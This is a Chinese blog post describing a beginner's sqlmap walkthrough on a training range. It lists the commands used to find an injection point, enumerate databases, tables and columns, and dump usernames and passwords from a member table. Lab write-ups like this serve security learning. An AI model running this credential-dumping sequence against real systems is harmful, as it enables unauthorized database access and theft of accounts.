美文网首页
sqlmap| 初次体验(使用说明+实践)

sqlmap| 初次体验(使用说明+实践)

作者: 你可以叫我风平 | 来源:发表于2019-03-25 20:44 被阅读0次

本次sqlmap使用环境为墨者学院靶场------>墨者学院靶场

这关主要是在不知道用户名和密码的情况下利用sql盲注跑出账号和密码。手工注入这里就不说了,主要讲一下这次使用sqlmap的体验。

假如小伙伴像我一样刚使用sqlmap建议先看一下这篇文章,写的蛮详细。------>sqlmap使用教程

点击下方的维护公告可以发现这个页面有一个明显的注入点,我们用sqlmap测试一下

python sqlmap.py -u "url"

这个id是一个注入点 sqlmap也给出了playload。

接着我们继续跑出他的数据库:

python sqlmap.py -u "url" --dbs

跑出来五个数据库,这里我们并没有看到任何提示,只能一个一个的试,试到stormgroup时发现这个库里有东西。

继续跑出他里的表:-D stormgroup --tables

继续跑:-T member --colums

还跑:-D stormgroup -T member -C name,password,status --dump

账号密码就在这里了。第一个被禁用了,密码是第二个!

语句还是要多练习。

相关文章

  • sqlmap| 初次体验(使用说明+实践)

    本次sqlmap使用环境为墨者学院靶场------>墨者学院靶场 这关主要是在不知道用户名和密码的情况下利用sql...

  • sqlmap 参数中文说明

    一直在用sqlmap,但是真正用到的参数却没有几个,本文是详细的介绍了sqlmap工具中各个参数的使用说明,供以后...

  • sqlmap使用操作

    安装好sqlmap后,可以用cmd使用sqlmap D: cd sqlmap/sqlmap python sqlm...

  • 初次体验

    今天第一次使用,请大家多多指教啦

  • 初次体验

    ---两年前的草稿到现在才点发布,挺让人感慨... 初次体验。 虽然不知道简书的核心技术点在哪里,Larry君之前...

  • 初次体验

    睁开朦胧的睡眼,突然被响亮的一声吓到一丝睡意都没有了,把窗帘拉开,看到表弟那欠揍的表情,立刻穿上衣服出去把他抓住...

  • SQLMAP简介

    SQLMAP介绍 1.什么是SQLMAP? 2.SQLMAP能做什么? 3.SQLMAP目录介绍 什么是SQLMA...

  • 安全测试 sql注入 windows 实战

    1. sqlmap:http://sqlmap.org/[http://sqlmap.org/] 下载压缩包: 解...

  • Navicat 使用说明

    初次下载navicat,记录了下使用说明。 点击connection建立与数据库的链接image.pngimage...

  • 简书

    初次试用,体验。

网友评论

      本文标题:sqlmap| 初次体验(使用说明+实践)

      本文链接:https://www.haomeiwen.com/subject/ljfivqtx.html